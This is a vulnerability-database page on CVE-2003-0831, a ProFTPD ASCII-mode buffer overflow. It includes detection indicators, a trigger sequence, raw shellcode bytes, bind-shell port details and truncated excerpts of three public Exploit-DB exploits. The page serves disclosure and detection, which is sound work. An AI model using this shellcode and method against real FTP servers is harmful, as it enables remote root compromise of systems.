CVE-2003-0831
published 2003-11-17CVE-2003-0831: ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute…
PriorityP354critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
55.12%
98.9th percentile
ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80
bytes↗
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\xb0\x02\xcd\x80\x89\xc3\x85\xdb\x74\x08\x31\xdb\x31\xc0\xb0\x01\xcd\x80
- →The exploit triggers the vulnerability by uploading a file filled entirely with 0x0a (newline) bytes via FTP STOR in ASCII mode, then retrieving it with RETR in ASCII mode to trigger the xlate_ascii_write() buffer overflow. ↗
- →The overflow occurs in the _xlate_ascii_write() function (src/data.c) during ASCII-mode file transfer; monitor for large ASCII-mode FTP downloads following an upload of a file composed entirely of newline characters. ↗
- →Exploit requires the attacker to authenticate (even as anonymous), issue TYPE A (ASCII mode), upload a malformed file via STOR, then download it via RETR — monitor for this FTP command sequence from a single session. ↗
- →Post-exploitation, the shellcode binds a shell on port 4660 (0x1234); monitor for unexpected listening services on port 4660 on FTP servers running ProFTPD 1.2.7–1.2.9rc2. ↗
- →The exploit upload buffer is ~65 KB (EXPLOIT_BUF_SIZE 65535 / 65558 newline bytes); an unusually large ASCII-mode FTP upload composed entirely of newline bytes is a strong indicator of exploitation. ↗
- ·The exploit targets specific stack addresses for RedHat 8.0 with ProFTPD 1.2.8; return addresses differ per OS/build and must be brute-forced or adjusted for other targets. ↗
- ·The exploit brute-forces stack addresses between STACK_START and STACK_END; the exact range is platform-dependent and the exploit loops through candidates automatically. ↗
- ·The connect-back shellcode IP and port are embedded at fixed offsets within the shellcode buffer (OFFSET=39 for IP/port, OFF2=70 for bind port); bytes that equal 0x0a ('\n') in the port value will cause the exploit to abort. ↗
- ·The vulnerability may also affect ProFTPD versions prior to 1.2.7, though this has not been confirmed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force
exploitdb·2003-10-13
CVE-2003-0831 ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force
ProFTPd 1.2.7
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define STACK_START 0xbfffef04
#define STACK_END 0xbffff4f0
#define FTP_PORT 21
#define BINDSHELL_PORT 4660
#define SIZE 1024
#define EXPLOIT_BUF_SIZE 65535
#define DEFAULT_USER "anonymous"
#define DEFAULT_PASS "ftp@"
#define FAILURE -1
#define SUCCESS 0
#define NORMAL_DOWNLOAD 1
#define EXPLOIT_DOWNLOAD 2
#define DOWNLOAD 3
#define UPLOAD 4
#define ACCEPT_TIMEOUT 5
#define SLEEP_DELAY 19999999
/*
Leet 0-day HaggisCode (tm)
*/
char shellcode[] =
// setuid(0); setgid(0);
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
// fork() - parent terminates, killing proftpd and ending FTP
// session. This leaves the child process as a daemon...
"\x
Exploit-DB
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)
exploitdb·2003-10-04
CVE-2003-0831 ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)
---
/* proftpd 1.2.7/1.2.9rc2 remote root exploit by bkbll (bkbll#cnhonker.net, 2003/10/1)
* for FTP_ProFTPD_Translate_Overflow found by X-force
* happy birthday, China.
* this code is dirty, there are more beautiful exploits of proftpd for this vuln in the world.
* this code want to provied u a method, not finally exploit.
* using overflow _xlate_ascii_write function return address.
* because the overflow is before it connecting to our port,so I have no method for using current socket.
* and I have provied two method:bind port and connect back.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define SIZE 1024
#define BIGSIZE 1024*42
#define
Exploit-DB
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun
exploitdb·2003-09-23
CVE-2003-0831 ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun
---
// source: https://www.securityfocus.com/bid/8679/info
A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server.
It is also reported that ProFTPD does not adequately drop privileges in some circumstances, which may compound the risks associated with exploitation.
This issue could also affect versions prior to 1.2.7, though this has not been confirmed.
/*
* -- ProFTPd [1.2.7-1.2.8] proof-of-concept --
*
* This code is quite ugly, don't have time cle
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012072.htmlhttp://marc.info/?l=bugtraq&m=106441655617816&w=2http://marc.info/?l=bugtraq&m=106606885611269&w=2http://secunia.com/advisories/9829http://www.kb.cert.org/vuls/id/405348http://www.mandriva.com/security/advisories?name=MDKSA-2003:095http://xforce.iss.net/xforce/alerts/id/154https://exchange.xforce.ibmcloud.com/vulnerabilities/12200https://www.exploit-db.com/exploits/107/http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012072.htmlhttp://marc.info/?l=bugtraq&m=106441655617816&w=2http://marc.info/?l=bugtraq&m=106606885611269&w=2http://secunia.com/advisories/9829http://www.kb.cert.org/vuls/id/405348http://www.mandriva.com/security/advisories?name=MDKSA-2003:095http://xforce.iss.net/xforce/alerts/id/154https://exchange.xforce.ibmcloud.com/vulnerabilities/12200https://www.exploit-db.com/exploits/107/
2003-11-17
Published